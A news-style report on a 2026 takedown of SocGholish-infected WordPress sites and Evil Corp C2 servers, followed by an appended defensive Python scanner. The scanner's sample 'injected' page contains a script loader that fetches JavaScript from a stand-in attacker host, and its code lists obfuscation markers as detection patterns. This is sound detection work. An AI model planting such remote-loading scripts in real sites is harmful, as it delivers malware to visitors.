International law enforcement agencies and private security partners executed a coordinated takedown on June 18, 2026, dismantling nearly 15,000 WordPress sites infected with SocGholish malware and shutting down 106 command-and-control servers linked to Evil Corp, one of Russia’s most persistent cybercrime operations.
Operation Endgame
The action, branded “Operation Endgame,” represents one of the most comprehensive enforcement actions ever taken against the SocGholish botnet infrastructure. Coordinating across multiple jurisdictions, law enforcement simultaneously cleaned infected WordPress installations, seized or disrupted command-and-control servers, and sinkholed the 106 domains used to direct the botnet’s activity.
15,000 Infected WordPress Installations and 106 C2 Servers Dismantled
SocGholish has operated since at least 2019, making it one of the longest-running malware distribution networks still active. Over that period, the campaign built a distribution footprint spanning thousands of legitimate WordPress sites repurposed as silent malware relays. The simultaneous cleanup of both the infected-site layer and the C2 server layer was designed to prevent operators from simply redirecting surviving infected sites to replacement infrastructure — a tactic Evil Corp has used to maintain continuity after prior enforcement actions.
The Evil Corp Connection
SocGholish is attributed to Evil Corp, a Russia-based cybercrime group responsible for distributing Dridex banking malware, WastedLocker ransomware, and multiple other malware families over more than a decade of operations. Evil Corp members have been the subject of U.S. Treasury sanctions and DOJ indictments since 2019, making this takedown an extension of a multi-year enforcement effort rather than a standalone operation.
Evil Corp’s Prior Malware Families and Resilience to Enforcement
The group has demonstrated significant resilience to prior enforcement actions, repeatedly rebranding malware families and reshuffling infrastructure after previous law enforcement disruptions. The scale of this takedown — targeting both the infected distribution sites and the C2 infrastructure simultaneously — was designed to be more disruptive than piecemeal infrastructure seizures that Evil Corp has historically recovered from.
WordPress as a Malware Distribution Platform
The SocGholish operation’s reliance on compromised WordPress sites makes the campaign distinctive. Rather than standing up purpose-built malicious infrastructure, operators injected redirect scripts into legitimate WordPress installations, using the sites’ existing authority and search engine rankings to reach large audiences.
Visitors to infected WordPress sites were presented with convincing fake browser update dialogs. Clicking the prompt delivered a malicious JavaScript payload that installed banking trojans, ransomware, or credential stealers depending on the operator’s objective at the time of the visit.
Takedown Scope and Limitations
The cleanup of 15,000 infected WordPress sites is a significant operational achievement, but it does not address the underlying vulnerabilities that allowed the initial compromise. Outdated WordPress plugins, weak administrative credentials, and unpatched themes remain the primary infection vectors. Site owners whose installations were cleaned should expect re-infection attempts if the root-cause vulnerabilities are not addressed.
Residual SocGholish infection across WordPress sites not captured in this takedown also remains possible, as the network had seven years to expand its footprint.
Impact and Takeaway
The SocGholish takedown demonstrates that international law enforcement cooperation can successfully disrupt even long-established botnet infrastructure. Organizations hosting WordPress sites should audit plugin update status, implement web application firewall rules for known JavaScript injection signatures, and monitor outbound redirect activity. End users who visited WordPress sites between 2019 and June 2026 should assess whether fake browser update prompts led to credential or financial data compromise.
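As an added example (not code from this article, from Operation Endgame, or from any organization involved in the takedown), the following Python script implements the kind of site-owner check the recommendations above call for, and the re-infection concern in the previous section: it scans the rendered HTML of a WordPress page for script tags and inline loaders that pull JavaScript from hosts outside the site's own allowlist, and for obfuscation markers that are common in injected loaders and rare in hand-written theme code. The allowlist, the marker list, and the three sample pages are constructed for illustration (the attacker-side hostnames use the reserved `.invalid` TLD); no real SocGholish indicator is used, and a hit is a lead for review, not proof of compromise.

```python
"""Heuristic scan of rendered WordPress pages for injected script loaders.

Added illustration, not code from the article or any organization involved in
the takedown. It assumes only what the article states: an injected script in an
otherwise legitimate page that loads JavaScript from infrastructure the site
owner does not control. The allowlist, the obfuscation markers and the sample
pages below are constructed; attacker hostnames use the reserved .invalid TLD.
"""
import re
from dataclasses import dataclass
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the site legitimately loads scripts from: its own domain plus any CDN it
# knowingly uses. Assumed values; fill this from the site's theme/plugin manifest.
DEFAULT_ALLOWLIST = {"example.com", "cdnjs.cloudflare.com"}

# Markers common in obfuscated loaders and rare in hand-written theme code.
OBFUSCATION_MARKERS = {
    "eval": re.compile(r"\beval\s*\("),
    "atob": re.compile(r"\batob\s*\("),
    "document.write": re.compile(r"document\.write\s*\("),
    "fromCharCode": re.compile(r"String\.fromCharCode"),
    "hex-escape-run": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),
}

# Absolute or protocol-relative URL inside a string literal in inline code.
URL_IN_CODE = re.compile(r"""['"](?:https?:)?//([A-Za-z0-9.-]+)""")


@dataclass
class Finding:
    kind: str    # external_script | inline_external_url | inline_obfuscation
    detail: str
    line: int    # line in the HTML where the <script> tag starts


def _allowed(host, allowlist):
    """Exact match or subdomain of an allowlisted host."""
    host = host.lower()
    return any(host == a or host.endswith("." + a) for a in allowlist)


class _ScriptCollector(HTMLParser):
    """Collects <script src=...> references and inline script bodies with line numbers."""

    def __init__(self):
        super().__init__()
        self.external = []      # (src, line)
        self.inline = []        # (code, line)
        self._in_inline = False
        self._buf = []
        self._line = 0

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        self._line = self.getpos()[0]
        if src:
            self.external.append((src, self._line))
        else:
            self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self.inline.append(("".join(self._buf), self._line))
            self._in_inline = False


def scan_page(html, allowlist=DEFAULT_ALLOWLIST):
    """Return Findings for one rendered page; an empty list means nothing was flagged."""
    collector = _ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []

    for src, line in collector.external:
        host = urlparse(src).hostname   # None for same-origin relative paths
        if host and not _allowed(host, allowlist):
            findings.append(Finding("external_script", src, line))

    for code, line in collector.inline:
        for host in URL_IN_CODE.findall(code):
            if not _allowed(host, allowlist):
                findings.append(Finding("inline_external_url", host, line))
        hits = [name for name, rx in OBFUSCATION_MARKERS.items() if rx.search(code)]
        if hits:
            findings.append(Finding("inline_obfuscation", ", ".join(hits), line))
    return findings


# Constructed sample pages (not captured from any real site).
CLEAN_PAGE = """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/lodash.js/4.17.21/lodash.min.js"></script>
</head><body><p>Hello</p>
<script>jQuery(function($){ $('.menu').addClass('ready'); });</script>
</body></html>"""

INJECTED_PAGE = """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
</head><body><p>Hello</p>
<script>;(function(){var s=document.createElement('script');s.src='https://cdn.placeholder-c2.invalid/loader.js';document.head.appendChild(s);})();</script>
<script src="//static.placeholder-c2.invalid/update.js"></script>
</body></html>"""

OBFUSCATED_PAGE = """<html><body>
<script>eval(String.fromCharCode(118,97,114,32,97,61,49));</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in [("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE), ("obfuscated", OBFUSCATED_PAGE)]:
        for f in scan_page(page):
            print(f"{name}: line {f.line} {f.kind}: {f.detail}")
```

Run against the HTML a site actually serves (fetched as a visitor would see it, since injected loaders are often added at render time rather than stored in one obvious file), the script flags the two placeholder loaders in the injected sample and the eval-based inline script, and reports nothing for the clean page. The allowlist check accepts subdomains of listed hosts, so a site that uses several CDNs needs each one listed; a flagged host that turns out to be legitimate is added to the allowlist, and one that is not should trigger the plugin and theme review the article recommends.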
